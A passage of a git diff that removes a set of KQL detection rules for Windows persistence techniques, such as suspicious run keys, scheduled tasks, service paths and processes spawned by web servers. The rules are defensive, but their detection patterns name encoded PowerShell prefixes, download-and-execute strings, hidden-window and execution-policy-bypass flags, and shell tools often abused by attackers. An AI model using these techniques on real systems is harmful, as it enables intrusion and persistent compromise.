@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/20 -// Level: high -// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment" \ No newline at end of file diff --git a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index f12091dd..00000000 
--- a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware -// Tags: attack.persistence, attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\") \ No newline at end of file diff --git a/Persistence/Suspicious_File_Drop_by_Exchange.kql b/Persistence/Suspicious_File_Drop_by_Exchange.kql deleted file mode 100644 index 6f40640f..00000000 --- a/Persistence/Suspicious_File_Drop_by_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/04 -// Level: medium -// Description: Detects suspicious file type dropped by an Exchange component in IIS -// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003 -DeviceFileEvents -| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/Persistence/Suspicious_Get-Variable.exe_Creation.kql b/Persistence/Suspicious_Get-Variable.exe_Creation.kql deleted file mode 100644 index da1a04b7..00000000 --- a/Persistence/Suspicious_Get-Variable.exe_Creation.kql +++ /dev/null 
@@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/04/23 -// Level: high -// Description: Get-Variable is a valid PowerShell cmdlet -WindowsApps is by default in the path where PowerShell is executed. -So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. - -// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027 -DeviceFileEvents -| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_GrpConv_Execution.kql b/Persistence/Suspicious_GrpConv_Execution.kql deleted file mode 100644 index 1bc03b8a..00000000 --- a/Persistence/Suspicious_GrpConv_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/19 -// Level: high -// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors -// Tags: attack.persistence, attack.t1547 -DeviceProcessEvents -| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o" \ No newline at end of file diff --git a/Persistence/Suspicious_IIS_Module_Registration.kql b/Persistence/Suspicious_IIS_Module_Registration.kql deleted file mode 100644 index 02baba3a..00000000 --- a/Persistence/Suspicious_IIS_Module_Registration.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Microsoft (idea)
-// Date: 2022/08/04
-// Level: high
-// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
-// Tags: attack.persistence, attack.t1505.004
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_New_Service_Creation.kql b/Persistence/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Persistence/Suspicious_New_Service_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Outlook_Macro_Created.kql b/Persistence/Suspicious_Outlook_Macro_Created.kql
deleted file mode 100644
index e9f30292..00000000
--- a/Persistence/Suspicious_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql b/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
deleted file mode 100644
index bf7164d3..00000000
--- a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects potential PowerShell commands or code within registry run keys
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_By_Web_Server_Process.kql b/Persistence/Suspicious_Process_By_Web_Server_Process.kql
deleted file mode 100644
index 3fef9b24..00000000
--- a/Persistence/Suspicious_Process_By_Web_Server_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1190
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index 317441d1..00000000
--- a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql b/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Run_Key_from_Download.kql b/Persistence/Suspicious_Run_Key_from_Download.kql
deleted file mode 100644
index a2012d01..00000000
--- a/Persistence/Suspicious_Run_Key_from_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
deleted file mode 100644
index 55ba5abb..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023/04/20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql b/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
deleted file mode 100644
index 973b874b..00000000
--- a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.persistence, attack.t1546.002
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql b/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
deleted file mode 100644
index ccf4a3ab..00000000
--- a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Service_Path_Modification.kql b/Persistence/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Persistence/Suspicious_Service_Path_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql b/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
deleted file mode 100644
index 1df15c46..00000000
--- a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Startup_Folder_Persistence.kql b/Persistence/Suspicious_Startup_Folder_Persistence.kql
deleted file mode 100644
index b30c57ba..00000000
--- a/Persistence/Suspicious_Startup_Folder_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects when a file with a suspicious extension is created in the startup folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
